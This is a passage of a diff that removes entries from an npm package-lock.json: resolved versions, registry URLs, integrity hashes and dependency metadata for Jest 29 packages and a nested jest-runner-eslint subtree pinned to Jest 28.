}, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util/node_modules/@babel/code-frame": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.18.6.tgz", - "integrity": "sha512-TDCmlK5eOvH+eH7cdAFlNXeVJqWIQ7gW9tY1GJIpUtFb6CmjVyq2VM3u71bOyR8CRihcCgMUYoDNyLXao3+70Q==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.18.6" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner-eslint": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/jest-runner-eslint/-/jest-runner-eslint-2.2.1.tgz", - "integrity": "sha512-BSAB65hGhtr/Kmb7tSkfqFmK9LYwCMK8L1xcp+XaSToPFqr7sY1jleMZUeDhV0ITA33pW+JUCx5a02veVD2Q2w==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "cosmiconfig": "^7.0.0", - "create-jest-runner": "^0.11.2", - "dot-prop": "^6.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "eslint": "^7 || ^8", - "jest": "^27 || ^28 || ^29" - } - }, - "node_modules/jest-runner-eslint/node_modules/@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/console": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-28.1.3.tgz", - "integrity": "sha512-QPAkP5EwKdK/bxIr6C1I4Vs0rm2nHiANzj/Z5X2JQkrZo6IqvC4ldZ9K95tF0HdidhA8Bo6egxSzUFPYKcEXLw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/environment": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-28.1.3.tgz", - "integrity": "sha512-1bf40cMFTEkKyEf585R9Iz1WayDjHoHqvts0XFYEqyKM3cFWDpeMoqKKTAF9LSYQModPUlh8FKptoM2YcMWAXA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-lzc8CpUbSoE4dqT0U+g1qODQjBRHPpCPXissXD4mS9+sWQdmmpeJ9zSH1rS1HEkrsMN0fb7nKrJ9giAR1d3wBw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "expect": "^28.1.3", - "jest-snapshot": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/expect-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-28.1.3.tgz", - "integrity": "sha512-wvbi9LUrHJLn3NlDW6wF2hvIMtd4JUl2QNVrjq+IBSHirgfrR3o9RnVtxzdEGO2n9JyIWwHnLfby5KzqBGg2YA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "jest-get-type": "^28.0.2" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/fake-timers": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-28.1.3.tgz", - "integrity": "sha512-D/wOkL2POHv52h+ok5Oj/1gOG9HSywdoPtFsRCUmlCILXNn5eIWmcnd3DIiWlJnpGvQtmajqBP95Ei0EimxfLw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@sinonjs/fake-timers": "^9.1.2", - "@types/node": "*", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/globals": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-28.1.3.tgz", - "integrity": "sha512-XFU4P4phyryCXu1pbcqMO0GSQcYe1IsalYCDzRNyhetyeyxMcIxa11qPNDpVNLeretItNqEmYYQn1UYz/5x1NA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/expect": "^28.1.3", - "@jest/types": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/schemas": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-28.1.3.tgz", - "integrity": "sha512-/l/VWsdt/aBXgjshLWOFyFt3IVdYypu5y2Wn2rOO1un6nkqIn8SLXzgIMYXFyYsRWDyF5EthmKJMIdJvk08grg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@sinclair/typebox": "^0.24.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/source-map": { - "version": "28.1.2", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-28.1.2.tgz", - "integrity": "sha512-cV8Lx3BeStJb8ipPHnqVw/IM2VCMWO3crWZzYodSIkxXnRcXJipCdx1JCK0K5MsJJouZQTH73mzf4vgxRaH9ww==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.13", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/test-result": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-28.1.3.tgz", - "integrity": "sha512-kZAkxnSE+FqE8YjW8gNuoVkkC9I7S1qmenl8sGcDOLropASP+BkcGKwhXoyqQuGOGeYY0y/ixjrd/iERpEXHNg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/console": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/transform": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-28.1.3.tgz", - "integrity": "sha512-u5dT5di+oFI6hfcLOHGTAfmUxFRrjK+vnaP0kkVow9Md/M7V/MxqQMOz/VV25UZO8pzeA9PjfTpOu6BDuwSPQA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^28.1.3", - "@jridgewell/trace-mapping": "^0.3.13", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^1.4.0", - "fast-json-stable-stringify": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/types": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-28.1.3.tgz", - "integrity": "sha512-RyjiyMUZrKz/c+zlMFO1pm70DcIlST8AeWTkoUdZevew44wcNZQHsEVOiCVtgVnlFFD82FPaXycys58cf2muVQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/schemas": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@sinclair/typebox": { - "version": "0.24.51", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.24.51.tgz", - "integrity": "sha512-1P1OROm/rdubP5aFDSZQILU0vrLCJ4fvHt6EoqHEM+2D/G5MK3bIaymUKLit8Js9gbns5UyJnkP/TZROLw4tUA==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/jest-runner-eslint/node_modules/@sinonjs/commons": { - "version": "1.8.6", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-1.8.6.tgz", - "integrity": "sha512-Ky+XkAkqPZSm3NLBeUng77EBQl3cmeJhITaGHdYH8kjVB+aun3S4XBRti2zt17mtt0mIUDiNxYeoJm6drVvBJQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/jest-runner-eslint/node_modules/@sinonjs/fake-timers": { - "version": "9.1.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-9.1.2.tgz", - "integrity": "sha512-BPS4ynJW/o92PUR4wgriz2Ud5gpST5vz6GQfMixEDK0Z8ZCUv2M7SkBLykH56T++Xs+8ln9zTGbOvNGIe02/jw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@sinonjs/commons": "^1.7.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/jest-runner-eslint/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-runner-eslint/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/jest-runner-eslint/node_modules/create-jest-runner": { - "version": "0.11.2", - "resolved": "https://registry.npmjs.org/create-jest-runner/-/create-jest-runner-0.11.2.tgz", - "integrity": "sha512-6lwspphs4M1PLKV9baBNxHQtWVBPZuDU8kAP4MyrVWa6aEpEcpi2HZeeA6WncwaqgsGNXpP0N2STS7XNM/nHKQ==", - "dev": true, - "dependencies": { - "chalk": "^4.1.0", - "jest-worker": "^28.0.2", - "throat": "^6.0.1" - }, - "bin": { - "create-jest-runner": "generator/index.js" - }, - "peerDependencies": { - "@jest/test-result": "^28.0.0", - "jest-runner": "^28.0.0" - }, - "peerDependenciesMeta": { - "@jest/test-result": { - "optional": true - }, - "jest-runner": { - "optional": true - } - } - }, - "node_modules/jest-runner-eslint/node_modules/diff-sequences": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-28.1.1.tgz", - "integrity": "sha512-FU0iFaH/E23a+a718l8Qa/19bF9p06kgE0KipMOMadwa3SjnaElKzPaUC0vnibs6/B/9ni97s61mcejk8W1fQw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/emittery": { - "version": "0.10.2", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.10.2.tgz", - "integrity": "sha512-aITqOwnLanpHLNXZJENbOgjUBeHocD+xsSJmNrjovKBW5HbSpW3d1pEls7GFQPUWXiwG9+0P4GtHfEqC/4M0Iw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/jest-runner-eslint/node_modules/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-eEh0xn8HlsuOBxFgIss+2mX85VAS4Qy3OSkjV7rlBWljtA4oWH37glVGyOZSZvErDT/yBywZdPGwCXuTvSG85g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/expect-utils": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-diff": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-28.1.3.tgz", - "integrity": "sha512-8RqP1B/OXzjjTWkqMX67iqgwBVJRgCyKD3L9nq+6ZqJMdvjE8RgHktqZ6jNrkdMT+dJuYNI3rhQpxaz7drJHfw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^28.1.1", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-docblock": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-28.1.1.tgz", - "integrity": "sha512-3wayBVNiOYx0cwAbl9rwm5kKFP8yHH3d/fkEaL02NPTkDojPtheGB7HZSFY4wzX+DxyrvhXz0KSCVksmCknCuA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-environment-node": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-28.1.3.tgz", - "integrity": "sha512-ugP6XOhEpjAEhGYvp5Xj989ns5cB1K6ZdjBYuS30umT4CQEETaxSiPcZ/E1kFktX4GkrcM4qu07IIlDYX1gp+A==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-get-type": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-28.0.2.tgz", - "integrity": "sha512-ioj2w9/DxSYHfOm5lJKCdcAmPJzQXmbM/Url3rhlghrPvT3tt+7a/+oXc9azkKmLvoiXjtV83bEWqi+vs5nlPA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-haste-map": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-28.1.3.tgz", - "integrity": "sha512-3S+RQWDXccXDKSWnkHa/dPwt+2qwA8CJzR61w3FoYCvoo3Pn8tvGcysmMF0Bj0EX5RYvAI2EIvC57OmotfdtKA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "jest-worker": "^28.1.3", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-leak-detector": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-28.1.3.tgz", - "integrity": "sha512-WFVJhnQsiKtDEo5lG2mM0v40QWnBM+zMdHHyJs8AWZ7J0QZJS59MsyKeJHWhpBZBH32S48FOVvGyOFT1h0DlqA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-matcher-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-28.1.3.tgz", - "integrity": "sha512-kQeJ7qHemKfbzKoGjHHrRKH6atgxMk8Enkk2iPQ3XwO6oE/KYD8lMYOziCkeSB9G4adPM4nR1DE8Tf5JeWH6Bw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - 